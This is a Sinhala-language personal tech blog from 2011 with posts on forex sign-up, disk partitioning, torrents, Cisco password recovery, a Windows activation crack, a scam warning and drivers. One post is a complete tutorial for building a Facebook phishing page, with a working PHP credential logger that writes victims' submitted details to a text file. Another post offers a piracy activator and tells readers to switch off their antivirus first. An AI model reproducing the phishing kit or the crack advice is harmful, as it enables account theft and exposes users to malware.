Monday, December 12, 2011

Forex වලින් සල්ලි හොයන්නේ කොහොමද ? ලිපි අංක 1

Forex වලින් සල්ලි හොයන්නේ කොහොමද ?

       Forex කියන්නේ මොනවද කියලා මගේ "Forex ගැන සිංහලෙන් ඉගෙන ගනිමු" පිටුවෙන් ඔයාලා දැන ගන්න ඇති.  මම කියලා දෙන්නේ ජනප්‍රියම Forex Trading වර්ගයක් ගැන. මම උඩින් තියෙන ලෝගෝ එකෙන් පෙන්නලා තියෙන්නේ ඒ වර්ගයයි. ඒ තමයි Etoro කියන එක. මම සම්බන්ධ වෙලා ඉන්නෙත් මේකට. මේකට ඇතුළු වෙන්න කිසිම වියදමක් යන්නේ නෑ. නොමිලේ සම්බන්ධ වෙන්න පුළුවන්. සමහර අයනම් මේකට සල්ලි අරගෙන කරලා දෙනවා. ඒත් ඇත්ත ඒක නෙවෙයි. මොකද මම දැන් මේ Forex වලින් සල්ලි හොයන කෙනෙක්. මේක අනිත් ඒවා වගේ නෙවෙයි. නිකම්ම සල්ලි ලැබෙන්නේ නෑ. අපි ආයෝජනයක් මුලින්ම කරන්න ඕන. ඒ ආයෝජනය කරන සල්ලි වලින් තමයි අපි ගනු දෙනු කරලා මුදල් උපයා ගන්න ඕන. ඒ වගේම කියන්න ඕන මේක ලේසියෙන් සල්ලි හොයන්න පුළුවන් එකක් නෙවෙයි. එහෙම ලේසියෙන් සල්ලි හම්බ කරන්න පුළුවන් ඒවා කොහෙවත් නෑ. ගොඩක් අය ගොඩක් දේවල් කීවට ඒවා බහුතරයක් බොරු බව ඔයාල දන්නවා. මොකද ඒවගෙන් ඔය කියන තරම් හම්බ වෙනවනම් අපිට වෙන රැකියාවක් නොකර ගෙදර ඉන්න පුළුවන්. මේකෙන් ලාබ වගේම පාඩු වෙන්නත් පුළුවන්. ඒක තීරණය වෙන්නේ ඔයාලගේ දක්ෂ කම සහ මේ වෙනුවෙන් වෙන් කරන වෙලාව මත. මමත් මුලින් පාඩු වින්දා. ඒත් දැන් මම ලාබ ගන්නවා. මහන්සි වෙලා හොයාගත්තු දේවල් මම ඔයාලට නොමිලේම කියලා දෙන්නම්. මම ඒකට සල්ලි ගන්නේ නෑ කාගෙන්වත්. අද බ්ලොග් එකෙන් මම මේ etoro වල ලියාපදිංචි වෙන්නේ කොහොමද කියලා කියලා දෙන්නම්. එහෙනම් වැඩේ පටන් ගමු.
                  මුලින්ම මේ ලින්ක් වලට ගිහින් ලියාපදිංචි වෙන්න ඕන. හරිම ලේසි පියවර කීපයක් විතරයි තියෙන්නේ. 

පියවර අංක 1 : http://www.etoropartners.com   මේකෙන් වෙන්නේ etoropartners කියන පිටුවට ඔයාලව සම්බන්ද කරන එකයි. ඒකෙනුත් පොඩි පොඩි වාසි තියෙනවා. 
පහල රූපයෙන් පෙන්වලා තියෙන තැන ක්ලික් කරලා අහල තියෙන විස්තර ටික නිවැරදිව සම්පුර්ණ කරන්න ඕන. අමතක කරන්න එපා මේකට බොරු විස්තර දෙන්න එපා. තමන්ගේ ඇත්ත විස්තර දෙන්න.
හරියට සම්පුර්ණ කලාට පස්සේ වෙන පිටුවකට යනවා. එකේ තියෙනවා ගොඩක් විස්තර. ඒවා හොඳින් කියවල බලන්න. ගොඩක් ප්‍රයෝජනවත් දේවල් තියෙනවා.

පියවර අංක 2 : http://www.etoro.com/  මෙතනත් ඔයාල ලියාපදිංචි වෙන්න ඕන. 

මෙතන ලියාපදිංචි වෙන විට ඔයාලා ලබා දෙන දුරකථන අංකයට මේ සයිට් එකෙන් කතාකරනවා. පොඩි පොඩි ප්‍රශ්න ටිකක් අහනවා. ඒවාට පිළිතුරු දෙන්න. එච්චරයි. මේ ඇමතුමට කතා නොකලා කියලා ප්‍රශ්නයක් වෙන්නේ නෑ. මොකද සමහර අයට භාෂා ප්‍රශ්නයක් තියෙනවනේ. ඒක එච්චර හිතන්න එපා. එකෙන් අහන්නේ මුලින්ම කොච්චර ආයෝජනය කරනවද ? කොහොමද සම්බන්ධ උනේ ? මේකට සම්බන්ද උනාම තියෙන වාසි, එයාලගේ සේවාව ගැන විස්තර වගේ පොඩි දේවල් ටිකක් ටිකක්.  
            දැන් ලියාපදිංචියත් ඉවරනේ.  ප්‍රධාන වැඩ ටික ඉවරයි. මේ ටික හදපු ගමන්ම සල්ලි දාලා වැඩේ පටන් ගන්න පුළුවන්. වේගවත් අන්තර්ජාල සම්බන්ධතාවයක් තියෙනවනම් මේ පෙන්නපු වෙබ් පිටුවේම තියෙන WEB Trader එකෙන් වැඩ කරන්න පුළුවන්. එහෙම නැතිනම් ETORO සොෆ්ට්වෙයාර් ඒක තමන්ගේ පරිගණකයට දාගෙන මේක කරන්නත් පුළුවන්. සොෆ්ට්වෙයාර් ඒක මෙන්න මෙතනින් බාගන්න පුළුවන්. 
                  ඒත් කිසිම පුහුණුවක් නැතිව මේකට අත ගහන එක ලොකු පාඩු ලබන්න හේතුවක් වෙනවා. ඒක නිසා මේ සයිට් එකෙන් අපිට පුහුණු වෙන්න Practice Trading Mode එකකුත් දෙනවා. තමන්ගේ User Neme එකයි Password එකයි භාවිතා කරලා ඇතුළු වෙලා Practice කරන්න පටන් ගන්න අදම.  Practice Trading එකේ වැඩ කරන්න සල්ලිත් දෙනවා(හැබැයි ඒවා ඇත්ත සල්ලි නෙවෙයි). බලන්න web trader එකයි etoro software එකයි පෙනෙන හැටි.

මේ ගැන තවත් තොරතුරු මේ වගේම බ්ලොග් එකකින් බලාපොරොත්තු වන්න.
මේ  ගැන ඔබට ඇතිවන ගැටළු කරුණාකර කොමන්ටුවකින් ඉදිරිපත් කරන්න.

Friday, December 9, 2011

Windows 7 වල Partition හදාගන්නේ කොහොමද

Windows 7 වල Partition හදාගන්නේ කොහොමද  ?


              ගොඩක් අයට තියෙන ප්‍රශ්නයක් තමයි තමන්ගේ ලැප්ටොප් එක හරි ඩෙස්ක් ටොප් එක හරි ගත්තට පස්සේ ගොඩක් වෙලාවට Partition තියෙන්නේ 1 යි . ඒ කිවේ C: Drive විතරයි. සම්පුර්ණ Hard Disk ඉඩ ප්‍රමාණයම C: Drive එකට Allocate වෙලා. නමුත් අපිට තවත් Partition කීපයක් හදාගන්න ඕන නම් මොකද කරන්නේ. ගොඩක් අයනම් කියන්නේ Partition කඩන්න පුළුවන් සොෆ්ට්වෙයාර් එකක් දාගෙන වැඩේ කරගන්න කියලා. නමුත් Partition 3 ක් විතර ඕන නම් ඔය මොකුත් සොෆ්ට්වෙයාර් ඕන නෑ. වින්ඩෝස් ඇතුලේ ඉඳලම ඒක කරගන්න පුළුවන් පහසුකම් තියෙනවා. හැබැයි 3 කට වැඩිය ඕනෙනම් වෙන සොෆ්ට්වෙයාර් එකක් ඕන වෙනවා.  කරන්න තියෙන්නේ බොහොම පොඩි වැඩ ටිකක්. එහෙනම් අපි වැඩේ පටන් ගමු.
              
              මුලින්ම ඩෙස්ක්ටොප් එකේ පෙන්න තියෙන Computer අයිකන් එක උඩ රයිට් ක්ලික් කරලා Manage කියන එකට යන්න.

ඊට පස්සේ පෙන්නේ මෙන්න මේ විදියේ එකක්. එකේ තියෙනවා Disk Management කියලා එකක් ඒක ක්ලික් කරන්න. ඊට පස්සේ එන වින්ඩෝ එකේ තියෙන දේවල් හොඳට බලන්න. මේකේ තියෙන අගයන් ඔයාලගේ පරිගණකයේ අගයන් එක්ක වෙනස් වෙන්න පුළුවන් ඒත් මේ දේවල්ම තමයි තියෙන්නේ. 

දැන් ඒකේ තියෙන C: Drive එක උඩ රයිට් ක්ලික් කරලා Shrink Volume කියන එක ක්ලික් කරන්න.
දැන් මෙන්න මේ වගේ එකක් එනවා. මෙතැනදී ටිකක් සැලකිල්ලෙන් වැඩ කරන්න ඕන. මොකද මෙතැනදී කරන දේ තමයි අපේ වැඩේ වැදගත්ම තැන වෙන්නේ.
මෙතන අන්තිමට තියෙන අගය තමයි වින්ඩෝස් වලට දැනට අවශ්‍යය ධාරිතාවය. ඒ වගේම Enter the amount of space to shrink in MB: කියන්නේ අපට හදාගන්න බලාපොරොත්තු වෙන අලුත් Partition එකට හෝ දෙකට ඉතිරි වී ඇති ඉඩ ප්‍රමාණයයි. අපට පුළුවන් මේ ඉතිරි වී ඇති මුළු ඉඩ ප්‍රමාණයම තවත් Partition එකකට හෝ දෙකකට යොදා ගන්නට. ඒත් සැලකිලිමත් වියයුතු ප්‍රධාන දෙයක් තමයි. අපට ලබා ගතහැකි මුළු ඉඩ ප්‍රමාණයම යොදා නොගත යුතුයි. එයට හේතුව මේ C: Drive එකට තවත් යම් යම් සොෆ්ට්වෙයාර් එකතු කිරීමට ඉඩ තිබිය යුතුයි. මම 1000 MBක් පමණ වැඩිපුර C: Drive එකට ඉතිරි කරලා ඉතිරි ප්‍රමාණය වෙන් කර ගන්නවා.
  දැන් පහතින් තියෙන Shrink කියන butten එක ඔබන්න. බලන්න මොකද වෙන්නේ කියලා.


යම් කොටසක් Unallocated විදියට තියෙනවා. මේ කොටස තමයි. අපේ වැඩේට යොදා ගන්නේ. දැන් මේ  Unallocated කොටස උඩ රයිට් ක්ලික් කරලා  New Simple Volume කියන එක ක්ලික් කරන්න.
 
 ඒකට  පස්සේ එන්නේ මේ වගේ එකක්.
මම තවත් Partition එකකට ඉඩ තියලා 4000 MB විතරක් ගත්තා. මේ විදියට වෙනස් කරගෙන ඊළඟ පියවරට යන්න.
මේතැනත් මොකුත් වෙනස් කරන්න අවශ්‍ය නෑ ඉදිරියට යන්න.
මේ විදියට හදාගෙන ඉදිරියට යන්න.
දැන් හොඳට බලන්න වෙලා තියෙන දේ. මම වෙන් කරගත්තු කොටසින් Partition එකක් හැදිලා තවත් කොටසක් ඉතිරි වෙලා තියෙනවා. ඒකෙනුත් මම හදපු විදියට තවත් Partition එකක් හදා ගන්න පුළුවන්. ඒ වගේම අපට තව අවස්ථා එකයි ඉතිරි වෙලා තියෙන්නේ. ඒක හදන හැටි මම කියන්නේ නෑ. ඒක දැන් ඔයාලට පුළුවන්. මේ විදියට අපිට Partition 3 ක් දක්වා හදන්න පුළුවන්. ඊට වඩා හදනවනම් වෙන සොෆ්ට්වෙයාර් එකක සහය ගන්න වෙනවා. ගොඩක් දුරට වෙන සොෆ්ට්වෙයාර් එකකින් මේ වැඩේ කලත් මේ වගේ තමයි. පොඩි පොඩි වෙනස් කම් තිබුනත් ක්‍රමේ මේකම තමයි. මේ ටික ගොඩක් අයට ප්‍රයෝජනවත් වෙයි කියලා මම හිතනවා.




මේ ගැන ඔබේ අදහස් පොඩි කොමන්ටුවකින් දාලම යන්න

Monday, November 28, 2011

කොහොමද Torrent වලින් File එකක් Download කරන්නේ ?

කොහොමද Torrent වලින් Download කරන්නේ ?

            ගොඩක් අයට තියෙන ප්‍රශ්නයක් තමයි ටොරන්ට් වලින් මොනවා හරි බාගන්නේ කොහොමද කියන එක. ටොරන්ට් ගැන දැනගත්තට ඒකෙන් වැඩ කරන හැටි දාන්නේ නෑ. අද මම කියලා දෙන්නේ ටොරන්ට් වලින් ෆයිල් එකක් බාගන්න ආකාරය. මේ වැඩේට මුලින්ම අපිට තියෙන්නේ ඕන Torrent Client සොෆ්ට්වෙයාර් එකක්. අන්තර්ජාලයෙන් ඒ වගේ ඒවා ගොඩක් ගන්න පුළුවන් නොමිලේම. මම දෙන්නම් ජනප්‍රියම කීපයක ලින්ක්. 

uTorrent    BitTorrent  BitComet

මෙතනින් කැමති Torrent Client එකක් තෝරාගන්න. හැබැයි මම කියල දෙන්නේ uTorrent වලින් වැඩ කරන්නේ කොහොමද කියලා.එහෙම කීවට අනිත් ඒවත් මහලොකු වෙනසක් නෑ. මුලින්ම මම දීල තියෙන ලින්ක් එකෙන් Torrent Client එක බාගෙන ඒක තමන්ගේ පරිගණකයට Install කරගන්න. ඒක කලාට පස්සේ ඔයාලගේ ඩෙස්ක්ටොප් එකට එනවා මෙන්න මේ වගේ අයිකන් එකක්.


ඊළඟට අපි අපිට අවශ්‍ය කරන ෆයිල් එකක ටොරන්ට් එකක් බාගන්න ඕන. එකටත් අන්තර්ජාලයේ ඕනෑතරම් තැන් තියෙනවා. පහතින් දක්වලා තියෙනවා වැඩිපුරම භාවිතා වෙන කීපයක්.

ISOHUNT     MININOWA

මම Isohunt කියන එකෙන් ගිහින් එකක් බාගන්න හැටි කියලා දෙන්නම්. පළමුවෙන්ම වෙබ් පිටුවට යන්න. ඊට පස්සේ තමන්ට හොයගන්න අවශ්‍ය කරන ෆයිල් එකේ නම ලියන්න. මෙන්න මේ විදියට.

මේක Search කලාම මෙන්න මේ වගේ පේනවා.


දැන් බලන්න ඔයාල හොයපු සොෆ්ට්වෙයාර් එක එතන තියෙනවද කියලා. එහෙම බලා තියෙනවනම් මේ මම රතුපාටින් ලකුණු කරලා තියෙනවා වගේ Seeds වැඩි පුර තියෙන ටොරන්ට් එකක් තෝරාගන්න. Seeds අඩු උනොත් බාගන්න ගොඩක් වෙලා යනවා. එක නිසා ඒ ගැන ගොඩක් සැලකිලිමත් වෙන්න ඕන. දැන් ඕන කරන ටොරන්ට් එක තොරගත්තනේ. ඒක උඩ ක්ලික් කරන්න. එතකොට මෙන්න මේ වගේ තැනකට යනවා. මෙතැනදී තමයි ටොරන්ට් ඒක බාගන්නේ.



මේක ක්ලික් කලාම ටොරන්ට් ෆයිල් ඒක ගන්න පුළුවන්. ඊට පස්සේ අර කලින් Install කරගත්තු Torrent Client එක ඕපන් කරගන්න. එකේ ෂෝර්ට් කට් එකක් ඩෙස්ක්ටොප් එකේ ඇති. ටොරන්ට් ෆයිල් එක තියෙන ෆෝල්ඩර් එකෙන් ටොරන්ට් එක අර ඕපන් වෙලා තියෙන සොෆ්ට්වෙයාර් එකට ඇදලා දාන්න(Drag කරන්න) එහෙම දැම්මට පස්සේ මෙන්න මේ විදියට ටොරන්ට් එක වැඩ කරන්න පටන් ගන්නවා. ඊට කලින් ටොරන්ට් එකෙන් බාගන්න ෆයිල් එක යන්නේ මොන ෆෝල්ඩර එකටද කියලා අහනවා. එකත් තමන්ට කැමති තැනකට හදාගන්න. 


මේ විදියට මේක සම්පුර්ණයෙන්ම බාගෙන අවසන් උනාට පස්සේ එතනට ගිහින් බලන්න ඔයාට ඕන කරන දේ එතන තියෙනවා. මම මෙතන විස්තර කරලා තියෙන්නේ බොහොම කෙටියෙන් මොනවා හරි අපැහැදිලි තැනක් තියෙනවනම් දාන්න කොමන්ට් එකක්.

මේ ගැන ඔබේ අදහස් පොඩි කොමන්ටුවකින් දාලම යන්න

 

Wednesday, November 9, 2011

Phishing Web Site එකක් හදන්නේ කොහොමද ?

Phishing Web Site එකක් හදන්නේ කොහොමද ?


     මම අද කියලා දෙන්නේ අනිත් අය රවට්ටන වෙබ් පිටුවක් හදන ආකාරයයි. මේකට කියන හරි වචනය Phishing කියලා. මාළු බාන එක ගැන අහලා ඇතිනේ. ඒ වගේම තමයි. ආස හිතෙන ඇමක් දාලා තමන්ට අවශ්‍ය දෙයක් වංචාවෙන් ලබාගැනීම. හැබැයි මේක කියලා දෙන්නේ කාටවත් කරදර කරන්න නෙවෙයි. මේ ගැන ඉගෙන ගන්න. ඒ වගේම මේවගේ දේවල් තියෙනවා කියන එක දැන ගන්න. එහෙනම් අපි පටන් ගමු.
1. ඉස්සර වෙලාම තමන්ට හදාගන්න ඕන පිටුවට අවශ්‍ය කරන Source 
    code එක ඇත්ත වෙබ් පිටුවෙන් ගන්න ඕන. ඒක කරන්නේ අවශ්‍ය 
    වෙබ් පිටුව ඕපන් කරලා එකේ Source code ඒක කොපි කරගන්න.
    පිටුව උඩ right click කරලා "View Page Source" ක්ලික් කරන්න. 
    (මම මේකට ගන්නේ ෆේස්බුක් ඇතුළු වීමේ පිටුව)

2. දැන් නෝට්පෑඩ් එකක් ඕපන් කරලා එකට Code එක past කරගන්න.

3. දැන් action="https://www.facebook.com/login.php කියලා 
    ලියලා තියෙන කොටස හොයාගන්න ඕන.

4. දැන් මේ කොටස වෙනස් කරන්න ඕන තමන් හදන්න යන පිටුවේ 
   ලිපිනය ලෙසට. මම හදපු පිටුවේ ලිපිනය තමයි මේ තියෙන්නේ.  
   මේක ඔයාල හදන්න යන පිටුවේ නමට වෙනස් වෙන්න ඕන.
   action="http://facebook.lkstuff.info/login.php

5. ඊළඟට  method="post"  කියන තැන හොයලා මේ විදියට වෙනස් 
    කරන්න. method="get"     

6. දැන් මේ නෝට්පෑඩ් ඒක save as කරන්න ඕන Index.html කියන 
    නමින්. ඒ වගේම Save as Type කියන එක තියෙන්න ඕන All files 
    කියන එකේ.  

7. දැන් තවත් අලුත් නෝට්පෑඩ් එකක් ඕපන් කරගෙන මෙන්න මේ 
    Code එක දාගන්න 

<?php
header("Location: https://www.Facebook.com");
$handle = fopen("/home/lkstuf/public_html/facebook/password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

මෙතන නිල් පාටින් ලියලා තියෙන්නේ මම පාස්වර්ඩ් සේව් වෙන්න දීල තියෙන ෆයිල් එකේ නම සහ ඒක වෙබ් සර්වර් එකේ තියෙන තැන. මේ ෆයිල් එකත් Save as කරන්න login.php කියන නමින්. ඒ වගේම Save as Type කියන එක තියෙන්න ඕන All files කියන එකේ.
 

8. ඊළඟට තවත් අලුත් නෝට්පෑඩ් එකක් ඕපන් කරලා එක password.txt යන නමින් සේව් කරගන්න.

9. දැන් ඔයාලා ෆයිල් තුනක් හදලා තියෙනවා.
   1. index.html
   2. login.php
   3. password.txt

10. දැන් මේ ෆයිල් ඔයාලා Host කරන සයිට් එකට අප්ලෝඩ් කරන්න. දැන් කරන්න ඕන දේවල් ඔක්කොම කරලා ඉවරයි. දැන් බලන්න Phishing site එක වැඩ කරනවද කියලා. හරියට වැඩ කරන්නේ නැතිනම් බලන්න ෆයිල් සේව් කරලා තියෙන තැන සහ File path හරියට තියෙනවද කියලා. ඔය ටික හරියට තියෙනවනම් මේක වැඩ කරනවා. ට්‍රයි කරලා බලලා password.txt ෆයිල් එක ඕපන් කරලා බලන්න ඒකට ඇවිල්ලා ඇති ට්‍රයි කරපු අයගේ විස්තර.


මේ ගැන ඔබේ අදහස් පොඩි කොමන්ටුවකින් දාලම යන්න

Saturday, November 5, 2011

Cisco Router එකක පාස්වර්ඩ් එක නැති උනොත් Recover කරන්නේ කොහොමද ?

Cisco Router එකක පාස්වර්ඩ් එක නැති උනොත් Recover කරන්නේ කොහොමද ?

               අද මම කියලා දෙන්නේ මේ වන විට ජනප්‍රියම ජාලකරණ උපාංග වර්ගයක් වන Cisco වෙළඳ නාමය ඇති උපාංග සඳහා ගොඩක්ම අවශ්‍ය වෙන දෙයක්. ජාලකරණයේදී බහුලවම භාවිතා වෙන දෙයක් තමයි Router. ඉතින් මේ රවුටර් එකේ Login Password එක එහෙම නැති උනොත් හරිම අමාරුවක් තමයි වෙන්නේ. රවුටර් එක ඇතුලට යන්නේ නැතිව කිසිම වෙනස් කිරීමක් කරන්න බෑ. ගොඩක් අය හිතන්නේ මේ Cisco උපකරණ වල පාස්වර්ඩ් එක කඩන්න බෑ කියලා. නමුත් Cisco ආයතනයෙන්ම ඒකට ක්‍රමයක් දීලා තියෙනවා. මෙම ක්‍රමය හැකිං වලට අයිති වෙන්නේ නෑ. මේ ක්‍රමය අනුගමනය කරන්න රවුටරය ලඟම ඉන්න ඕන. දුරක ඉඳලා මේ ක්‍රමය අනුගමනය කරන්න බෑ. එහෙනම් අපි වැඩේ පටන් ගනිමු. මුලින්ම ඕන වෙනවා රවුටරය මිලදී ගන්නා විට ඒ සමග ලැබෙන Console කේබලය. ඒක මෙන්න මේ වගේ එකක් . පහත රූපයේ ඒක පෙන්වලා තියෙනවා.
           දැන් මේ කේබලය නිවැරදි ආකාරයට සම්බන්ධ කරගන්න ඕන. ඒක කරන්නේ පහත රූපයේ ආකාරයට.

      ඊළඟට කරන්න තියෙන්නේ පරිගණකයෙන් රවුටරයට Access කරන සොෆ්ට්වෙයාර් එක සකසා ගැනීම. Windows Xp තියෙන අයට නම් Hyper Terminal පාවිච්චි කරන්න පුළුවන්. Windows 7 තියෙනවා අයට Hyper Terminal නැති නිසා Putty වගේ සොෆ්ට්වෙයාර් එකක් පාවිච්චි කරන්න පුළුවන්. ඒක තමන් ළඟ නැතිනම් මෙතනින් බාගන්න. දැන් සොෆ්ට්වෙයාර් එකේ Serial Port එකේ settings හදා ගන්න. Hyper Terminal වල සහ Putty වල ඒවා තිබිය යුතු ආකාරය පහත රූප වලින් පෙන්වලා තියෙනවා.


දැන් මේ විදියට හදාගෙන පහත අනු පිළිවෙලට කරන්න.
1. Prompt එකට ගියාට පසු රවුටර් එක Reboot කරන්න. 
2. Reboot ක්‍රියාවලිය ඇරඹුණු විටම යතුරු පුවරුවේ ctrl සහ break බොත්තම    
   කීප සැරයක් ඔබන්න. එවිට rommon 1 > යන අවස්ථාවට පැමිණේ.
3. එවිට පහත විධානය ලබා දෙන්න. 
    confreg 0x2142
    එවිට නැවත rommon 2 > යන අවස්ථාවට පැමිණේ.
4. ඉන්පසු පහත විධානය ලබා දෙන්න.
    reset
    එවිට රවුටරය නැවත Boot වීමට පටන් ගනී. එසේ Boot වන්නේ අලුත්ම රවුටරයක් Boot වන ආකාරයටයි. ඉහත confreg 0x2142 විධානයෙන් කරනුයේ දැනට FLASH මතකයේ ඇති Configuration ෆයිල් එක NVRAM එකට ලබා නොදී ක්‍රියාත්මක කරන ලෙසට විධාන කිරීමයි.

Would you like to enter the initial configuration dialog? [yes/no]: n


ඉහත අකාරයෙන් ලබා දුන් පසු සාමාන්‍ය පරිදි router> යන තත්වයට පත් වේ. ඉන් පසු 

enable      විධානය ලබා දී 

copy startup-config running-config

යන විධානය ලබාදෙන්න. 

   බැරි වීමකින් හෝ මෙය අනෙක් අතට ලබාදුන්නේ නම්(copy running-config startup-config) දැනට රවුටරයේ ඇති Configuration file එක මැකී යයි. එවිට මුල සිටම රවුටරයේ සියලුම Configuration සිදු කල යුතුය. දැන් රවුටරයේ පෙර තිබු සියලුම  Configuration නැවත දක්නට ලැබෙනු ඇත. ඉන් පසු සියලුම පාස්වර්ඩ් අවශ්‍ය ආකාරයට නැවත සකසා ගන්න. දැන් පහත අනුපිලිවෙලට විධාන ලබා දෙන්න.
1. සියලුම භාවිතා වන Interface සඳහා no shutdown   
   විධානය දෙන්න 
2. configure terminal
3. config-register 0x2102
4. දැන් සියලුම PASSWORD තමන්ට අවශ්‍ය ආකාරයට වෙනස්
   කරගන්න.
5. exit
6. copy running-config startup-config

මෙහි අවසාන විධානයෙන් රවුටරයේ දැනට ඇති Configuration file එක වෙත අවසානයට කල සියලුම විධාන සහ දැනට  ක්‍රියාත්මක වන Configuration ඇතුලත් කිරීම සිදු කරයි. මෙම සියලුම අවස්ථාවන් නිවැරදි ලෙස කරගත් විට රවුටරයේ පෙර තිබු සියලුම Configuration සහිතව පාස්වර්ඩ් පමණක් වෙනස් කොට පෙර පරිදිම භාවිතයට ගතහැක.

මේ ගැන ඔබේ අදහස් පොඩි කොමන්ටුවකින් දාලම යන්න.

Wednesday, November 2, 2011

කොහොමද නොමිලේම Windows Genuine කරගන්නේ ?

කොහොමද නොමිලේම Windows Genuine කරගන්නේ ?



           හැමෝටම මේ දවස් වල ගොඩක් වෙලාවට එන ප්‍රශ්නයක් තමයි. වින්ඩෝස් ජෙනුයින් කරගන්නේ කොහොමද කියන එක. මගෙනුත් ගොඩක් අය අහනවා. අන්තර්ජාලයේ හොයලා බලනකොට ගොඩක් ක්‍රම හොයාගන්න පුළුවන්. ඒත් ගොඩක් අයට ඒක හොයාගන්න තේරුමක් නෑ. ඒක නිසා මම හිතුවා හැමෝටම තේරෙන විදියට සිංහලෙන් ඒ ගැන ලියන්න. මම මේ මෙහෙම කීවට මෙතන මහා ලොකු දෙයක් කරන්න නෑ. පොඩි ෆයිල් එකක් ක්‍රියාත්මක කරන්න විතරයි තියෙන්නේ. ඊට පස්සේ පරිගණකය Restart කරන්න විතරයි තියෙන්නේ එච්චරයි. මම මෙතන යටින් ෆයිල් එක  බාගන්න ලින්ක් එක  දීලා තියෙනවා. 


         මේසොෆ්ට්වෙයාර් එක බාගෙන ක්‍රියාත්මක කරලා බලන්න. මේක ඕනෑම වින්ඩෝස් වර්ෂන් එකකට හරියනවා. වැදගත් දෙයක් මේක දාන්න කලින් වයිරස් ගාර්ඩ් එකක් එහෙම දාලා තියෙනවනම් ඒකේ ආරක්ෂාව තාවකාලිකව නවත්වන්න. නැතිනම් මේ සොෆ්ට්වෙයාර් එක වයිරස් එකක් විදියට අල්ලලා අයින් කරලා දානවා.

මේ ගැන ඔබේ අදහස් පොඩි කොමන්ටුවකින් දාලම යන්න.

Tuesday, October 4, 2011

free Credit හොයන අයට ලොකු අනතුරු ඇඟවීමක්

free Credit හොයන අයට ලොකු අනතුරු ඇඟවීමක් 

         මේක ඔය එක එක දේවල් වලට free Credit හොයන අයට කරන අනතුරු ඇඟවීමක්. Facebook එකේ Free Barn Buddy Credit ගන්නේ කොහොමද කියලා මගෙන් ඔය කීප දෙනෙක් ඇහුවා. මමත් ඉතින් ළමයින්ගේ අසාවනේ කියලා මේගැන විස්තර ටිකක් හොයලා බැලුවා අන්තර් ජාලයේ. මෙන්න ගහන කොටම මට ෆ්‍රී ක්‍රෙඩිට් දෙන ලිං එකක් හම්බ උනා. මටත් ඉතින් හරි සතුටුයි. මේ ක්‍රමේ කියලා දෙන්න ලැබෙනවනේ කියලා. එහෙම කියලා හිතාගෙන බ්ලොග් එකක් දාන්න හිතාගෙනම වෙබ් පිටුව කියවලා බැලුවා. කියවලා බලනකොටනේ වැඩේ තේරුනේ. මේකට කීදෙනෙක් අහුවෙන්න ඇතිද කියලා මට හිතුනා. ඒත් වැඩක් නෑ. එයාලගේ Facebook එකවුන්ට් මේ වෙනකොටත් අහිමි වෙලා ඇති. මට ලැබුන පිටුව තමා මේ තියෙන්නේ. මෙන්න තියෙනවා ලින්ක් එක ගිහින් බලන්න.



හැබැයි මේ පිටුවේ කියලා තියෙන දේ කරන්න යන්න නම් එපා. එකේ තියෙන විදියට කරනවා කියන්නේ තමන්ගේ Facebook පාස්වර්ඩ් එකයි ඊමේල් ලිපිනයයි කිසිම කරදයක් නැතිව ඒ හොරාට පූජා කරනවා කියන එක. මේ පිටුවේ දාලා තියෙන්නේ බොරුවට ලියපු කෝඩ් එකක් එයාලා කියන්නේ ඒ කෝඩ් එකට ඔයාගේ පාස්වර්ඩ් එක දාලා යට කියලා තියෙන ඊමේල් ලිපිනයකට(barnbuddy.facebook@techie.com) එවන්න කියලා. ඊට පස්සේ පය කීපයකින් අපි ඉල්ලපු Free Barn Buddy Credit ලැබෙනවා කියලා. මේක දැක්කම සාමාන්‍ය කෙනෙක්නම් හොඳට රැවටෙනවා. ඉතින් උඩ පැනලා තමන්ගේ පාස්වර්ඩ් එකත් එක්ක ඊමේල් එකක් යවනවා. අනේ අහිංසකයෝ පහුවදා නහයෙන් අඬනවා මගේ Facebook එක හැක් කරලා කියලා. මේ වගේ වෙබ් පිටු ගැන බොහොම සෝදිසියෙන් ඉන්න. මේක එකක් විතරයි. තවත් ගොඩක් මේ විදියට තියෙනවා. ඒ වගේම සොෆ්ට්වෙයාර්. නිකන් දෙනවා කියන පලියට අහුවෙන්න එපා. බහුතරයක් පට්ටපල් බොරු ,රැවටිලි. මේක කියවලා දන්නා කියන හැමෝටමත් පෙන්නන්න. කාට හරි මේක ප්‍රයෝජනයක් වෙයි.

මේ ගැන ඔබේ අදහස් පොඩි කොමන්ටුවකින් දාලම යන්න.

Sunday, October 2, 2011

පරිගණකය Format කරාට පස්සේ Drivers ටික හොයාගන්නේ කොහොමද ?

පරිගණකය එක Format කරාට පස්සේ Drivers ටික හොයාගන්නේ කොහොමද ?

        අද මම කියලා දෙන්නේ ගොඩක්ම ප්‍රයෝජනවත් දෙයක්. අපි ගොඩක් වෙලාවට අපේ පරිගණකයට මොනවා හරි ප්‍රශ්නයක් වෙලා ෆෝමැට් කලාට පස්සේ එකේ තිබුන Drivers ටික හොයාගන්න කරදර වෙනවා. සමහර Drivers නම් Operating System එකෙන්ම දාගන්නවා. එත් සමහර Drivers එහෙම දාගන්නේ නෑ. ඒවා අපි දාගන්න ඕන. ගොඩක් වෙලාවට එහෙම ඕන වෙන්නේ Sound Drivers, VGA Drivers, Modem Drivers වගේ ඒවා. ඉතින් කොහොමද ඒවා හරියටම හොයා ගන්නේ. හැමෝටම ඔය Hardware එක ගැන ලොකු අවබෝධයක් නෑනේ. කොහොම හරි වෙන්න ඕන පරිගණකය හරියට වැඩ කරන්නනේ. ඉතින් Driver එක මොකද්ද කියලා දන්නේ නැති උනත් ඒක හරියටම හොයලා දාගන්න පුළුවන් ක්‍රමයක් තමයි මේ. ඉස්සර වෙලාම පොඩි සොෆ්ට්වයාර් එකක් තියෙනවා පරිගණකයට දාගන්න. ඒක මෙන්න මේ ලින්ක් එකෙන් බාගන්න.

එහෙම නැතිනම් මෙන්න මේ වෙබ් පිටුවට ගිහින් ඔය පහල තියෙන එක උඩ ක්ලික් කරන්න 

ඊට පස්සේ ඔයාලගේ පරිගණකයට මම කියපු සොෆ්ට්වයර් එක Download වෙනවා. දැන් ඒක තියෙන තැනට ගිහින් පරිගණකයට ඒක Install කරගන්න. ඒක කරන පිළිවෙල මම පහතින් පෙන්වලා තියෙනවා. ඒ විදියට කරගෙන යන්න. 



ඊට පස්සේ පේනවා මෙන්න මෙහෙම එකක් 

